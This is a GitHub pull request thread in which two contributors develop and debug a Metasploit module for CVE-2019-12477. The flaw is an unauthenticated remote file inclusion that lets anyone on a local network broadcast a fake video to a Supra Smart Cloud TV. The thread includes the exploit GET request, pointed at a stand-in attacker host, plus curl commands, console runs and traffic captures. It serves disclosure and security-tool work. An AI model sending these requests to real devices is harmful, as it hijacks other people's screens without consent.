Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Supra Smart Cloud TV RFI fake broadcast (CVE-2019-12477) #11952

Merged
merged 13 commits into from Jun 28, 2019

Conversation

Projects
None yet
4 participants
@RootUp
Copy link
Contributor

commented Jun 6, 2019

Summary

This module exploits an unauthenticated remote file inclusion which
exists in Supra Smart Cloud TV. The media control for the device doesn't
have any session management or authentication. Leveraging this, an
attacker on the local network can send a crafted request to broadcast a
fake video.

Steps to verify

msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132
SRVHOST => 192.168.1.132
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155
[*] Using URL: http://192.168.1.132:8080/
[*] Broadcasting Epic Sax Guy to 192.168.1.155:80
[+] Doo-doodoodoodoodoo-doo
[*] Sleeping for 10s serving .m3u8 and .ts files...
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > 

Technical observation

Supra Smart Cloud TV allows remote file inclusion in the openLiveURL function, which allows a local attacker to broadcast fake video without any authentication via a /remote/media_control?action=setUri&uri=URI

Vulnerable GET request

GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Example:
http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

However, I am still stuck in serving .m3u8 file, my idea was to have a small video inside our MSF data/ folder and we call it directly when the module is run.

References
GitHub : #11943
Blog: https://www.inputzero.io/2019/06/hacking-smart-tv.html
Video PoC: https://www.youtube.com/watch?v=2babA1KVpdw

@h00die

This comment has been minimized.

Copy link
Contributor

commented Jun 6, 2019

It looks like m3u8 files are text files which can take urls, why not make a datastore option for something like 'videourl' with a deFault of https://youtu.be/kxopViU98Xo
Then you don't have to host yourself or add a video file to msf

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 7, 2019

@RootUp: Can you provide your .m3u8 file?

@h00die: Usually, .m3u(8) files reference raw audio or video sources, so I'm not sure YouTube would work directly... but there is always a way. I think we need more Epic Sax Guy.

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 7, 2019

Hi @wvu-r7
Here is my .m3u8 file I've used ffmpeg to convert .mp4 to .m3u8. Although there are .TS typescript as supporting files to play .m3u8

Cmd: ffmpeg -i epicsax.mp4 -hls_list_size 0 epicsax.m3u8

wvu-r7 added some commits Jun 7, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 7, 2019

Please review the commits I've pushed. I've added minimal HttpServer support. The rest is on you!

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 9, 2019

Thank you @wvu-r7

Also, I cannot send raw for .m3u8 under request.uri.

  def on_request_uri(cli, request)
   print_status("Sending #{request.uri}")
   if request.uri =~ 
   	send_response(cli, request)
   else 
   	print_status("Something went wrong")
  end
end

Or am i suppose to use File.join(Msf::Config.data_directory) to call .m3u8 files.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 9, 2019

I would use a file in the data directory, yes. You can use File.read with File.join. Look around for examples.

@wvu-r7 wvu-r7 added the delayed label Jun 10, 2019

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 10, 2019

I tried using File.join this performs the RFI to the TV, but apparently fake video don't run properly, or am i missing something?

  def on_request_uri(cli, request)
   print_status("Sending #{request.uri}")
   path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-12477', 'epicsax')
   ::File.open(path, "m3u8") {|fd| fd.read(fd.stat.size) }
   send_response(cli, request)
  end
end
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 10, 2019

Try set HttpTrace true and compare your requests to curl -v.

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 10, 2019

From MSF:

msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155

[*] Using URL: http://192.168.1.132:8080/znAgiud31Y7
********************
####################
# Request:
####################
GET /remote/media_control?action=setUri&uri=http%3a//192.168.1.132%3a8080/znAgiud31Y7 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK 
Set-Cookie: JSESSIONID=d1d7af53-44f3-4559-ac22-5f904b258084
Date: Mon, 10 Jun 2019 18:11:11 GMT
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 403
Server: EShare Http Server/1.0

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>

[+] Fake video was broadcasted
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > 

Curl:

$ curl -v http://192.168.1.155/remote/media_control?action=setUri&uri=http://192.168.1.132:9090/epicsax.m3u8
[1] 9819
$ *   Trying 192.168.1.155...
* TCP_NODELAY set
* Connected to 192.168.1.155 (192.168.1.155) port 80 (#0)
> GET /remote/media_control?action=setUri HTTP/1.1
> Host: 192.168.1.155
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK 
< Set-Cookie: JSESSIONID=d1cbefb4-5f90-4ad0-9586-54bd3208ecea
< Date: Mon, 10 Jun 2019 18:14:18 GMT
< Connection: keep-alive
< Accept-Ranges: bytes
< Content-Type: text/html
< Content-Length: 403
< Server: EShare Http Server/1.0
< 
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>
* Connection #0 to host 192.168.1.155 left intact

[1]+  Done                    curl -v http://192.168.1.155/remote/media_control?action=setUri
$ 
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 10, 2019

You probably want an .m3u8 extension on your HttpServer URL. You can change that with URIPATH or Path to start_service directly.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 10, 2019

You should quote your URL to curl, too... & is breaking apart your command.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 20, 2019

@RootUp: How's it going?

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 20, 2019

Hi @wvu-r7 apologies for the delay, I tried adding .m3u8 extensions on my HttpServer but couldn't do so need some suggestions on code from you're end to get this completed, aside I was on leave for a week.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 20, 2019

I'll take a stab at completing this without access to a test device. Can you test for me?

@wvu-r7 wvu-r7 self-assigned this Jun 20, 2019

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 21, 2019

Yes, I still have access to the device I can test it.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 26, 2019

Testing your .m3u8 and .ts files:

wvu@kharak:~$ mplayer -vo matrixview -loop 0 http://localhost:8080/epicsax.m3u8
wvu@kharak:~/Downloads/sax$ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
127.0.0.1 - - [25/Jun/2019 22:18:33] "GET /epicsax.m3u8 HTTP/1.0" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:33] "GET /epicsax0.ts HTTP/1.1" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:36] "GET /epicsax1.ts HTTP/1.1" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:38] "GET /epicsax2.ts HTTP/1.1" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:39] "GET /epicsax3.ts HTTP/1.1" 200 -
127.0.0.1 - - [25/Jun/2019 22:18:41] "GET /epicsax4.ts HTTP/1.1" 200 -

Good so far, working on module now.

@wvu-r7

This comment has been minimized.

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 26, 2019

Hi @wvu-r7
I tried testing this module against the TV, it sends the request but video is not played, TV gives a warning which says "Don't support and exit!". Aside I manually tired with the same video file and .ts file via curl and was able to broadcast the video.

From MSF:

msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155

[*] Using URL: http://192.168.1.132:8080/
[*] Sending fake broadcast to 192.168.1.155:80
********************
####################
# Request:
####################
GET /remote/media_control?action=setUri&uri=http%3a//192.168.1.132%3a8080/epicsax.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK 
Set-Cookie: JSESSIONID=8bd19ba3-108d-4494-b66d-ad08a9d56bb0
Date: Wed, 26 Jun 2019 05:28:05 GMT
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 403
Server: EShare Http Server/1.0

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>

[+] Fake video was broadcasted
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) >

From curl:

$ curl -v "http://192.168.1.155/remote/media_control?action=setUri&uri=http://192.168.1.132:9090/epicsax.m3u8"
*   Trying 192.168.1.155...
* TCP_NODELAY set
* Connected to 192.168.1.155 (192.168.1.155) port 80 (#0)
> GET /remote/media_control?action=setUri&uri=http://192.168.1.132:9090/epicsax.m3u8 HTTP/1.1
> Host: 192.168.1.155
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK 
< Set-Cookie: JSESSIONID=76b23bce-ef93-4290-b5fd-44626719908e
< Date: Wed, 26 Jun 2019 05:25:46 GMT
< Connection: keep-alive
< Accept-Ranges: bytes
< Content-Type: text/html
< Content-Length: 403
< Server: EShare Http Server/1.0
< 
<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>
* Connection #0 to host 192.168.1.155 left intact
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 26, 2019

Hi, please try again with the new commit. Maybe the TV can't handle encoded params.

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 26, 2019

Hi @wvu-r7 I tried running the latest commit against the TV, although we are still failing here the TV gives a warning of "Don't support and exit!". I also tried sending custom headers via 'headers' => but no luck so far.

It's strange because .m3u8 and .ts files stored in my exploits/CVE-2019-12477 when used/run manually via curl works perfect and video is broadcasted.

msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155

[*] Using URL: http://192.168.1.132:8080/
[*] Sending fake broadcast to 192.168.1.155:80
********************
####################
# Request:
####################
GET /remote/media_control?action=setUri&uri=http://192.168.1.132:8080/epicsax.m3u8 HTTP/1.1
Host: 192.168.1.155
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK 
Set-Cookie: JSESSIONID=fea734dc-0351-4fcd-bdbc-1d37bcc92a5c
Date: Wed, 26 Jun 2019 15:00:37 GMT
Connection: keep-alive
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 403
Server: EShare Http Server/1.0

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/remote/favicon.ico" mce_href="/remote/favicon.ico" type="image/x-icon">
<title>OK</title>
</head>

<body>
OK
</body>
</html>

[+] Fake video was broadcasted
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > 
@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 27, 2019

Can you upload a pcap? Or are you willing to fix the issue?

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 27, 2019

Hi @wvu-r7
I've shared the pcap file on msfdev [at] metasploit [.] com. Please let me know if you want me to share it here.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 27, 2019

In the Metasploit pcap, I don't see any requests from the TV for the .m3u8 or .ts files.

I noticed you're using different service ports: 8080 for Metasploit and 9090 for SimpleHTTP/0.6 Python/2.7.15+. You sure the TV can reach Metasploit? Firewall?

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 28, 2019

Hi, @wvu-r7 I tried this on a different host by disabling the firewall but it couldn't work out.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 28, 2019

@RootUp: I found a bug. Since this isn't an exploit with a handler, I need to sleep at the end of run for on_request_uri to have time to handle requests. I'll push up a patch. Are you around to test?

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 28, 2019

I see, yea I am up will test right away.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 28, 2019

Please try again. If it doesn't work, we can try sending the exact request that worked.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 28, 2019

The pcap seems to confirm this bug.

25	2.684986486	[TV]	[You]	57751	8080	TCP	74	57751 → 8080 [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=41124 TSecr=0 WS=64
26	2.685038299	[You]	[TV]	8080	57751	TCP	54	8080 → 57751 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0

And yeah, no firewall, since that's clearly a RST instead of a timeout! (Unless your firewall was configured to return RSTs.)

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 28, 2019

I tested the latest commit, this work's perfect it was able to broadcast the video, please give me some time so that I can push docs and upload the latest PCAP file for your reference. Then probably we are good to land.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 28, 2019

Awesome, thanks! I am sorry it took so long. I should have paid more attention to the pcap! Ironically, I noticed the module bug first. 😅

@wvu-r7 wvu-r7 changed the title [WIP] Supra smart cloud TV - CVE 2019 12477 Supra Smart Cloud TV RFI fake broadcast (CVE-2019-12477) Jun 28, 2019

@wvu-r7 wvu-r7 removed the delayed label Jun 28, 2019

@wvu-r7 wvu-r7 added feature and removed needs-docs labels Jun 28, 2019

@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 28, 2019

Sample Output:

msf5 > use auxiliary/admin/http/supra_smart_cloud_tv_rfi 
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set SRVHOST 192.168.1.132
SRVHOST => 192.168.1.132
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > set RHOSTS 192.168.1.155
RHOSTS => 192.168.1.155
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > run
[*] Running module against 192.168.1.155
[*] Using URL: http://192.168.1.132:8080/
[*] Broadcasting Epic Sax Guy to 192.168.1.155:80
[+] Doo-doodoodoodoodoo-doo
[*] Sleeping for 10s serving .m3u8 and .ts files...
[*] Server stopped.
[*] Auxiliary module execution completed
msf5 auxiliary(admin/http/supra_smart_cloud_tv_rfi) > 

Also, I've email the latest PCAP file for your reference. I've added the documentation waiting for travis checks to pass.

Removing comments
Thanks wvu-r7 for your support.
@RootUp

This comment has been minimized.

Copy link
Contributor Author

commented Jun 28, 2019

Hi @wvu-r7 I've made the necessary changes, please have a look hope we are good to land.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 28, 2019

Release Notes

This adds a module to send a fake video broadcast to a Supra Smart Cloud TV via a remote file inclusion in its web interface.

@wvu-r7 wvu-r7 merged commit 09d6ae3 into rapid7:master Jun 28, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request Jun 28, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 28, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.